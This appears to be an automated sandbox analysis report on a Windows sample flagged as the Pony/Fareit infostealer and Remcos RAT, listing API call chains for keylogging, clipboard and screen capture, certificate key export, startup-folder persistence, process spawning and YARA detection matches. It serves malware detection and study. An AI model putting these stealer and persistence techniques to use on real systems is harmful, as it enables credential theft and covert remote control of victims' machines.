                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: [Right] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: [Up] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: [Left] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: [End] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: [F2] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: [F1] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: [Del] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: [Del] 11_2_004051EA
                    Contains functionality to register a low level keyboard hook
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_00404643 SetWindowsHookExA 0000000D,00404628,00000000,0000000011_2_00404643
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_0040C5BF ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,OpenClipboard,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_0040C5BF
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_0040E25E EmptyClipboard,?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,GlobalAlloc,GlobalLock,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_0040E25E
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_0040E25E EmptyClipboard,?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,GlobalAlloc,GlobalLock,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_0040E25E
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_0040F0DF Sleep,CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,DeleteDC,DeleteDC,DeleteDC,DeleteObject,SelectObject,DeleteDC,DeleteDC,DeleteDC,DeleteObject,StretchBlt,DeleteDC,DeleteDC,DeleteDC,DeleteObject,DeleteObject,GetCursorInfo,GetIconInfo,DeleteObject,DeleteObject,DrawIcon,GetObjectA,DeleteDC,DeleteDC,DeleteDC,DeleteObject,LocalAlloc,GlobalAlloc,DeleteDC,DeleteDC,DeleteDC,DeleteObject,GetDIBits,DeleteDC,DeleteDC,DeleteDC,DeleteObject,GlobalFree,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,DeleteObject,GlobalFree,DeleteDC,DeleteDC,DeleteDC,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_0040F0DF
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_0040469B GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,11_2_0040469B

                    E-Banking Fraud

                    barindex
                    Yara detected Pony
                    Source: Yara matchFile source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SGS.exe PID: 4720, type: MEMORYSTR
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4505601069.00000000022FF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4505309464.00000000004F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 432, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 6000, type: MEMORYSTR

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Contains functionalty to change the wallpaper
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_00411F9F ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,SystemParametersInfoW,11_2_00411F9F

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
                    Source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                    Source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Fareit Payload Author: kevoreilly
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000C.00000002.2350240628.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                    Source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
                    Source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                    Source: Process Memory Space: SGS.exe PID: 4720, type: MEMORYSTRMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
                    Source: Process Memory Space: SGS.exe PID: 4720, type: MEMORYSTRMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                    Source: Process Memory Space: file.exe PID: 6000, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: SGS.exe PID: 6656, type: MEMORYSTRMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                    Pony trojan / infostealer detected
                    Source: Signatures Results: All Signatures
                    Source: C:\Users\user\Desktop\file.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 9_2_0019F91C NtUnmapViewOfSection,9_2_0019F91C
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_0040E14C ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,ExitWindowsEx,LoadLibraryA,GetProcAddress,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_0040E14C
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0222B2E50_2_0222B2E5
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 2_2_0218B2E52_2_0218B2E5
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_004121E95_2_004121E9
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_00402EFD5_2_00402EFD
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 10_2_01FEB2E510_2_01FEB2E5
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: String function: 00404351 appears 51 times
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: String function: 00401D71 appears 139 times
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: String function: 00410808 appears 42 times
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: String function: 0041282A appears 41 times
                    Source: file.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: scan[1].exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: SGS.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: file.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: file.exe, 00000000.00000003.2126925157.0000000000737000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepexplorer.exe8 vs file.exe
                    Source: file.exe, 00000000.00000000.2050062927.000000000046F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamepexplorer.exe8 vs file.exe
                    Source: file.exe, 00000000.00000003.2141671886.0000000004861000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepexplorer.exe8 vs file.exe
                    Source: file.exe, 00000000.00000002.2142430073.00000000006CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepexplorer.exe8 vs file.exe
                    Source: file.exe, 00000009.00000002.2306718875.0000000000944000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepexplorer.ex vs file.exe
                    Source: file.exe, 00000009.00000003.2285813255.00000000046A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepexplorer.exe8 vs file.exe
                    Source: file.exe, 00000009.00000003.2304232651.000000000091F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepexplorer.ex vs file.exe
                    Source: file.exe, 00000009.00000003.2304232651.00000000008A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepexplorer.exe8 vs file.exe
                    Source: file.exeBinary or memory string: OriginalFilenamepexplorer.exe8 vs file.exe
                    Source: file.exe.0.drBinary or memory string: OriginalFilenamepexplorer.exe8 vs file.exe
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
                    Source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                    Source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000C.00000002.2350240628.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                    Source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
                    Source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                    Source: Process Memory Space: SGS.exe PID: 4720, type: MEMORYSTRMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
                    Source: Process Memory Space: SGS.exe PID: 4720, type: MEMORYSTRMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                    Source: Process Memory Space: file.exe PID: 6000, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: SGS.exe PID: 6656, type: MEMORYSTRMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                    Source: classification engineClassification label: mal100.rans.troj.adwa.spyw.evad.winEXE@23/8@3/2
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_0040D3BE CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmp,lstrcmp,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,5_2_0040D3BE
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_00402968 LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,5_2_00402968
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_0040E7DF GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,11_2_0040E7DF
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_00402CE7 WTSGetActiveConsoleSessionId,CreateToolhelp32Snapshot,Process32First,StrStrIA,ProcessIdToSessionId,OpenProcess,OpenProcessToken,ImpersonateLoggedOnUser,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle,5_2_00402CE7
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_0040A875 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree,5_2_0040A875
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_0040937B FindResourceA,LoadResource,LockResource,SizeofResource,11_2_0040937B
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_00410C16 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,11_2_00410C16
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_03
                    Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-XVE2ON
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1632:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1276:120:WilError_03
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\SGS.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5234062.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" "
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: SGS.exe, 00000005.00000003.2179937676.000000000073B000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334695453.0000000000675000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334800606.00000000006A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: file.exeReversingLabs: Detection: 73%
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\SGS.exe "C:\Users\user\AppData\Local\Temp\SGS.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeProcess created: C:\Users\user\AppData\Local\Temp\SGS.exe C:\Users\user\AppData\Local\Temp\SGS.exe
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5234062.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" "
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Users\user\AppData\Local\Temp\SGS.exe "C:\Users\user\AppData\Local\Temp\SGS.exe"
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeProcess created: C:\Users\user\AppData\Local\Temp\SGS.exe C:\Users\user\AppData\Local\Temp\SGS.exe
